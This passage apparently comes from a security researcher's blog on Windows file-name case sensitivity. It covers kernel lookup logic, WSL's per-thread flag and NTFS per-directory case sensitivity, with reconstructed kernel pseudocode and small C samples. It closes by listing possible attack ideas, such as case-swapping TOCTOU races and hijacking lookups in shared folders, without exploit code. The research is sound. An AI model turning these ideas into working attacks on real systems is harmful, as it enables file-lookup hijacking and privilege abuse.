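            L"SYSTEM\\CurrentControlSet\\Control\\Session Manager\\kernel",
            L"obcaseinsensitive", RRF_RT_REG_DWORD, NULL,
            &value, &size) == ERROR_SUCCESS) {
        // 1 (the default) forces case-insensitive lookups kernel-wide.
        printf("obcaseinsensitive = %lu\n", value);
    }
    return 0;
}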

Let's try the same test again with PowerShell but make sure ObpCaseInsensitive is FALSE to see if we now get the expected operation.

Running the same tests but with ObpCaseInsensitive set to FALSE. With OBJ_CASE_INSENSITIVE the file open succeeds, without the flag it fails with an error.

With the OBJ_CASE_INSENSITIVE flag set we can still open the file AbC.txt with the lower case name. However, without specifying the flag we get STATUS_OBJECT_NAME_NOT_FOUND, which indicates the lookup operation failed.

Windows Subsystem for Linux

Let's fast forward to the introduction of WSL in Windows 10 1607. WSL needed some way of representing a typical case-sensitive Linux file system. In theory the developers could have implemented it on top of a case-insensitive file system, but that'd likely introduce too many compatibility issues. However, just disabling ObCaseInsensitive globally would introduce its own set of compatibility issues on the Windows side. A compromise was needed to support case-sensitive files on an existing volume.

Aside. It could be argued that Unix-like operating systems (including Linux) don't have a case-sensitive file system at all, but a case-blind file system. Most Unix-like file systems just treat file names on disk as strings of opaque bytes; either the file name matches a sequence of bytes or it doesn't. The file system doesn't really care whether any particular byte is a lower or upper case character. This of course leads to interesting problems, such as two file names which look identical to a user having different byte representations, resulting in unexpected failures to open files. Some file systems such as macOS's HFS+ use Unicode Normalization Forms to give file names a canonical byte representation, which makes this easier but leads to massive additional complexity, and was infamously removed in the successor APFS.

This compromise can be found back in ObpLookupObjectName as shown below:

NTSTATUS ObpLookupObjectName(POBJECT_ATTRIBUTES ObjectAttributes, ...) {
    // ...
    DWORD Attributes = ObjectAttributes->Attributes;
    if (ObpCaseInsensitive &&
        KeGetCurrentThread()->CrossThreadFlags.ExplicitCaseSensitivity == FALSE) {
        Attributes |= OBJ_CASE_INSENSITIVE;
    }
    // Continue lookup.
}

In the code we now find that the existing check for ObpCaseInsensitive is augmented with an additional check on the current thread's CrossThreadFlags for the ExplicitCaseSensitivity bit flag. Only if the flag is not set will case-insensitive lookup be forced. This looks like a quick hack to get case-sensitive files without having to change the global behavior. We can find the code which sets this flag in NtSetInformationThread.

NTSTATUS NtSetInformationThread(HANDLE ThreadHandle,
                                THREADINFOCLASS ThreadInformationClass,
                                PVOID ThreadInformation,
                                ULONG ThreadInformationLength) {
    switch (ThreadInformationClass) {
    case ThreadExplicitCaseSensitivity:
        if (ThreadInformationLength != sizeof(DWORD))
            return STATUS_INFO_LENGTH_MISMATCH;
        DWORD value = *((DWORD*)ThreadInformation);
        if (value) {
            if (!SeSinglePrivilegeCheck(SeDebugPrivilege, PreviousMode))
                return STATUS_PRIVILEGE_NOT_HELD;
            if (!RtlTestProtectedAccess(Process, 0x51))
                return STATUS_ACCESS_DENIED;
        }
        if (value)
            Thread->CrossThreadFlags.ExplicitCaseSensitivity = TRUE;
        else
            Thread->CrossThreadFlags.ExplicitCaseSensitivity = FALSE;
        break;
    }
    // ...
}

Notice that in the code, to set the ExplicitCaseSensitivity flag we need to have both SeDebugPrivilege and be a protected process at level 0x51, which is PPL at the Windows signing level. This code is from Windows 10 1809; I'm not sure it was this restrictive previously. However, for the purposes of WSL it doesn't matter, as all processes are gated by a system service and kernel driver so these checks can be easily bypassed. As any new thread for a WSL process must go via the Pico process driver, this flag could be automatically set and everything would just work.
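For completeness, here's a sketch of making the call from user mode. The information class value comes from reversed (phnt-style) headers rather than the SDK, so treat it as an assumption; on a normal process you'd expect STATUS_PRIVILEGE_NOT_HELD given the checks above:

#include <windows.h>
#include <winternl.h>
#include <stdio.h>

// Assumed value from reversed headers, not the Windows SDK.
#define ThreadExplicitCaseSensitivityClass ((THREADINFOCLASS)43)

typedef NTSTATUS (NTAPI *NtSetInformationThread_t)(
    HANDLE, THREADINFOCLASS, PVOID, ULONG);

int main(void) {
    NtSetInformationThread_t set_info = (NtSetInformationThread_t)
        GetProcAddress(GetModuleHandleW(L"ntdll"), "NtSetInformationThread");
    DWORD enable = 1;
    NTSTATUS status = set_info(GetCurrentThread(),
        ThreadExplicitCaseSensitivityClass, &enable, sizeof(enable));
    // Expect 0xC0000061 (STATUS_PRIVILEGE_NOT_HELD) without the checks passing.
    printf("NtSetInformationThread: 0x%08X\n", (unsigned int)status);
    return 0;
}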

Per-Directory Case-Sensitivity

A per-thread opt-out from case-insensitivity solved the immediate problem, allowing WSL to create case-sensitive files on an existing volume, but it didn't help Windows applications inter-operating with files created by WSL. I'm guessing NTFS makes no guarantees on which file will get opened if performing a case-insensitive lookup when there are multiple files with the same name but different case. A Windows application could easily get into difficulty trying to open a file and always getting the wrong one. Further work was clearly needed, so introduced in 1803 was the topic at the start of this blog, Per-Directory Case Sensitivity.

The NTFS driver already handled the case-sensitive lookup operation, therefore why not move the responsibility for enabling case-sensitive operation to NTFS? There's plenty of spare capacity for a simple bit flag. The blog post I referenced at the start suggests using the fsutil command to set case-sensitivity; however, of course, I want to know how it's done under the hood, so I put fsutil from a Windows Insider build into IDA to find out what it was doing. Fortunately changing case-sensitivity is now documented: you pass a FILE_CASE_SENSITIVE_INFORMATION structure, with the FILE_CS_FLAG_CASE_SENSITIVE_DIR flag set, to a directory via NtSetInformationFile with the FileCaseSensitiveInformation information class. We can see the implementation for this in the NTFS driver.

NTSTATUS NtfsSetCaseSensitiveInfo(PIRP Irp, PNTFS_FILE_OBJECT FileObject) {
    if (FileObject->Type != FILE_DIRECTORY) {
        return STATUS_INVALID_PARAMETER;
    }
    NTSTATUS status = NtfsCaseSensitiveInfoAccessCheck(Irp, FileObject);
    if (NT_ERROR(status))
        return status;
    PFILE_CASE_SENSITIVE_INFORMATION info =
        (PFILE_CASE_SENSITIVE_INFORMATION)Irp->AssociatedIrp.SystemBuffer;
    if (info->Flags & FILE_CS_FLAG_CASE_SENSITIVE_DIR) {
        if ((g_NtfsEnableDirCaseSensitivity & 1) == 0)
            return STATUS_NOT_SUPPORTED;
        if ((g_NtfsEnableDirCaseSensitivity & 2) &&
            !NtfsIsFileDeleteable(FileObject)) {
            return STATUS_DIRECTORY_NOT_EMPTY;
        }
        FileObject->Flags |= 0x400;
    } else {
        if (NtfsDoesDirHaveCaseDifferingNames(FileObject)) {
            return STATUS_CASE_DIFFERING_NAMES_IN_DIR;
        }
        FileObject->Flags &= ~0x400;
    }
    return STATUS_SUCCESS;
}

There's a bit to unpack here. Firstly you can only apply this to a directory, which makes some sense based on the description of the feature. You also need to pass an access check with the call NtfsCaseSensitiveInfoAccessCheck. We'll skip over that for a second. 

Next we get to the actual setting or unsetting of the flag. Support for Per-Directory Case-Sensitivity is not enabled unless bit 0 is set in the global g_NtfsEnableDirCaseSensitivity variable. This value is loaded from the NtfsEnableDirCaseSensitivity value in HKLM\SYSTEM\CurrentControlSet\Control\FileSystem, which is set to 0 by default. This means the feature is not available on a fresh install of Windows 10. Almost certainly this value is set when WSL is installed, but I've also found it on the Microsoft app-development VM, which I don't believe has WSL installed, so you might find it enabled in unexpected places. The g_NtfsEnableDirCaseSensitivity variable can also have bit 1 set, which indicates that the directory must be empty before changing the case-sensitivity flag (checked with NtfsIsFileDeleteable), however I've not seen that enabled. If those checks pass, then the flag 0x400 is set in the NTFS file object.

If the flag is being unset, the only check made is whether the directory contains any existing colliding file names. This seems to have been added recently, as when I originally tested this feature in an Insider Preview you could disable the flag with conflicting filenames present, which isn't necessarily sensible behavior.
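As an aside, if you want to experiment on a machine where the value isn't set, a hedged sketch for enabling bit 0 (requires admin, and I'd assume a reboot for the NTFS driver to re-read it):

#include <windows.h>

int main(void) {
    DWORD value = 1; // Bit 0: enable per-directory case sensitivity support.
    LSTATUS err = RegSetKeyValueW(HKEY_LOCAL_MACHINE,
        L"SYSTEM\\CurrentControlSet\\Control\\FileSystem",
        L"NtfsEnableDirCaseSensitivity", REG_DWORD, &value, sizeof(value));
    return err == ERROR_SUCCESS ? 0 : 1;
}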

Going back to the access check, the code for NtfsCaseSensitiveInfoAccessCheck looks like the following:

NTSTATUS NtfsCaseSensitiveInfoAccessCheck(PIRP Irp, PNTFS_FILE_OBJECT FileObject) {
    if (NtfsEffectiveMode(Irp) ||
        FileObject->Access & FILE_WRITE_ATTRIBUTES) {
        PSECURITY_DESCRIPTOR SecurityDescriptor;
        SECURITY_SUBJECT_CONTEXT SubjectContext;
        SeCaptureSubjectContext(&SubjectContext);
        NtfsLoadSecurityDescriptor(FileObject, &SecurityDescriptor);
        if (SeAccessCheck(SecurityDescriptor, &SubjectContext,
                          FILE_ADD_FILE | FILE_ADD_SUBDIRECTORY |
                          FILE_DELETE_CHILD)) {
            return STATUS_SUCCESS;
        }
    }
    return STATUS_ACCESS_DENIED;
}

The first check ensures the file handle is opened with FILE_WRITE_ATTRIBUTES access; however, that isn't sufficient to enable the flag. The check also ensures that, if an access check is performed on the directory's security descriptor, the caller would be granted FILE_ADD_FILE, FILE_ADD_SUBDIRECTORY and FILE_DELETE_CHILD access rights. Presumably this secondary check is to prevent situations where a file handle was shared to another process with fewer privileges but with FILE_WRITE_ATTRIBUTES rights.

If the security check is passed and the feature is enabled you can now change the case-sensitivity behavior, and it's even honored by arbitrary Windows applications such as PowerShell or notepad without any changes. Also note that the case-sensitivity flag is inherited by any new directory created under the original.

Showing setting case sensitive on a directory then using Set-Content and Get-Content to interact with the files.
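And for completeness, a sketch of setting the flag without fsutil. The information class value and structure layout are taken from the RE above and recent SDK headers, so treat them as assumptions:

#include <windows.h>
#include <winternl.h>

#define FILE_CS_FLAG_CASE_SENSITIVE_DIR 0x00000001
// FileCaseSensitiveInformation; value from recent SDK/reversed headers.
#define FileCaseSensitiveInformationClass 71

typedef struct _FILE_CASE_SENSITIVE_INFO {
    ULONG Flags;
} FILE_CASE_SENSITIVE_INFO;

typedef NTSTATUS (NTAPI *NtSetInformationFile_t)(
    HANDLE, PIO_STATUS_BLOCK, PVOID, ULONG, ULONG);

int main(void) {
    NtSetInformationFile_t set_info = (NtSetInformationFile_t)
        GetProcAddress(GetModuleHandleW(L"ntdll"), "NtSetInformationFile");

    // Open the directory with FILE_WRITE_ATTRIBUTES; the path is an example.
    HANDLE dir = CreateFileW(L"C:\\Temp\\CaseDir", FILE_WRITE_ATTRIBUTES,
                             FILE_SHARE_READ | FILE_SHARE_WRITE, NULL,
                             OPEN_EXISTING, FILE_FLAG_BACKUP_SEMANTICS, NULL);
    if (dir == INVALID_HANDLE_VALUE)
        return 1;

    IO_STATUS_BLOCK iosb;
    FILE_CASE_SENSITIVE_INFO info = { FILE_CS_FLAG_CASE_SENSITIVE_DIR };
    NTSTATUS status = set_info(dir, &iosb, &info, sizeof(info),
                               FileCaseSensitiveInformationClass);
    CloseHandle(dir);
    return status >= 0 ? 0 : 1; // NT_SUCCESS check.
}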

Security Implications of Per-Directory Case-Sensitivity

Let's get on to the thing which interests me most: what are the security implications of this feature? You might not immediately see a problem with this behavior, but what it does do is subvert the expectations of normal Windows applications when it comes to the behavior of file name lookup, with no way of detecting its use or mitigating against it. At least with the FILE_FLAG_POSIX_SEMANTICS flag you were only introducing unexpected case-sensitivity if you opted in, but this feature means the NTFS driver doesn't pay any attention to the state of OBJ_CASE_INSENSITIVE when making its lookup decisions. That's great from an interop perspective, but less great from a correctness perspective.

Some of the cases where I could see this being a problem are as follows:
  • TOCTOU attacks, where the file name used to open a file has its case modified between a security check and the final operation, resulting in the check opening a different file to the final one.
  • Overriding file lookup in a shared location if the create request's case doesn't match the actual case of the file on disk. This would be mitigated if the flag requiring the directory to be empty before changing case-sensitivity was enabled by default.
  • Directory tee'ing, where you replace lookup of an earlier directory in a path based on the state of the case-sensitive flag. This at least is partially mitigated by the check for conflicting file names in a directory, however I've no idea how robust that is.
I found it interesting that this feature doesn't use RtlIsSandboxToken to check that the caller's not in a sandbox. As long as you meet the access check requirements it looks like you can do this from an AppContainer, but it's possible I missed something. On the plus side this feature isn't enabled by default, but I could imagine it getting set accidentally through enterprise imaging, or some future application deciding it must be on, such as Visual Studio. At least it's a lot better from a security perspective than turning on case-sensitivity globally. Also, despite my initial interest, I've yet to actually find a good use for this behavior, but IMO it's only a matter of time :-)